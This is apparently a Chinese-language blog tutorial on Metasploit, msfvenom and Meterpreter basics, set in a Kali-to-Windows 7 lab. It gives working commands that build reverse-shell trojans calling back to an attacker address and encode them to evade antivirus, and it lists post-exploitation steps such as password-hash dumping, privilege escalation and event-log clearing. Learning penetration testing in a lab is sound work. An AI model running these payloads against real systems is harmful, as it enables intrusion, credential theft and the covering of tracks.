🗒️msf,msfvenom,meterpreter基础
2023-11-13
| 2023-11-13
字数 830阅读时长 3 分钟
type
Post
status
Published
date
Nov 13, 2023
slug
env/msf
summary
msf,msfvenom,meterpreter基础命令,参数解释,基本使用
tags
工具和环境配置
category
网络安全
icon
password

一.msf攻击命令

help /?
查看帮助
search
查找漏洞和利用数据库
exploit-db.com更全
use
使用模块
show options
查看模块配置参数
set
设置参数值
run/exploit
执行模块
background
将shell(meterpreter)放入后台
back
退回msf6>主界面

sessions和jobs

sessions 命令用于查看和管理通过漏洞利用获得的会话
jobs 主要用于管理在 Metasploit 中运行的后台任务
 
run/exploit返回meterpreter后,msf会将会话建立起来。
background将shell放入后台
通过sessions查看
使用sessions -i <ID>进入到一个特定的会话
 
jobs的使用类似以下这样,
use auxiliary/scanner/portscan/tcp set RHOSTS <目标IP> run -j将任务放入后台执行
使用jobs命令查看后台任务列表
jobs -i <ID>进入一个后台任务
jobs -k <ID>中止一个后台任务

show

notion image

search

查询详细参数 search -h
searchsploit可以直接在exploit-db.com中查询

二.msfvenom生成木马

- p <模块路径>/<平台>/<架构>/<Payload类型>
基于windows和linux的基础木马制作:
msfvenom -p windows/meterpreter/reverse_tcp lhost=1.1.1.1 lport=5555 -f exe -o test.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=1.1.1.1 lport=5555 -f elf -o test.elf
举例:
msfvenom -p windows/meterpreter/reverse_tcp lhost=1.1.1.1 lport=5555 -e x86/shikata_ga_nai -i 6 -b '\x00' -f c -o shell.c
  • p windows/meterpreter/reverse_tcp:
    • 指定生成 Meterpreter 反向 TCP shell 的 Payload,适用于 Windows 系统。
  • LHOST=1.1.1.1LPORT=5555:
    • 设置 Meterpreter 将要连接的监听地址(LHOST)和监听端口(LPORT)。在这里,1.1.1.1 表示攻击者的 IP 地址,5555 是监听端口。
  • e x86/shikata_ga_nai:
    • 使用 Shikata Ga Nai 编码器来混淆生成的 Payload,使其更难被杀毒软件检测。x86/shikata_ga_nai 是针对 x86 架构的 Shikata Ga Nai 编码器。
  • i 6:
    • 设置编码迭代次数为 6。这表示 Payload 将会经过 6 次编码。
  • b '\x00':
    • 指定不包含空字节 (\x00)。这是因为在许多情况下,空字节可能会导致 Payload 在某些环境中失效。
  • f c:
    • 指定输出格式为 C 语言代码。
  • o shell.c:
    • 指定输出文件名为 shell.c,将生成的 C 语言代码保存到这个文件中。
 
notion image
notion image
notion image

三、msfvenom + msf使用

在kali里生成基础木马(默认是x86架构,不选择)
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.245.132 LPORT=4444 -f exe -o win.exe
将win.exe丢入win7里面。
 
开启监听:
msfconsole
use exploit/multi/handler
set lhost 192.168.245.132
set lport 4444
run
 
此时点击win7里面的exe文件即可。
notion image

四、meterpreter

输入?直接查看所有命令
常用的命令:
查看用户权限
getuid
获取hash密码
hashdump
上传文件
upload 文件名
执行系统命令
execute -f <command> -i -H
获取shell
shell
查看目标机器系统信息
sysinfo
在目标主机搜寻文件
search -f xxxxx
提取
getsystem
清楚痕迹
clearev
execute命令详解:
  • - c(我没成功)
    • 用于指定执行的命令字符串。execute -c "echo Hello, Meterpreter!"
  • - i或者- H
    • H 主要用于隐藏命令提示符窗口,而 i 可以隐藏其他可执行文件的窗口。
  • -m 参数用于指定要执行的 Meterpreter 脚本。execute -m /root/scripts/myscript.rb
 
以下这个命令告诉我们哪些本地exploit可能利用成功
run post/multi/recon/local_exploit_suggester
notion image
 
手机命令
send_sms 发送信息到手机 app_list 列出安卓手机应用 app_run <package name> 打开应用
notion image
 
  • 工具和环境配置
  • 内网提权知识学习cobalt strike功能学习
    Loading...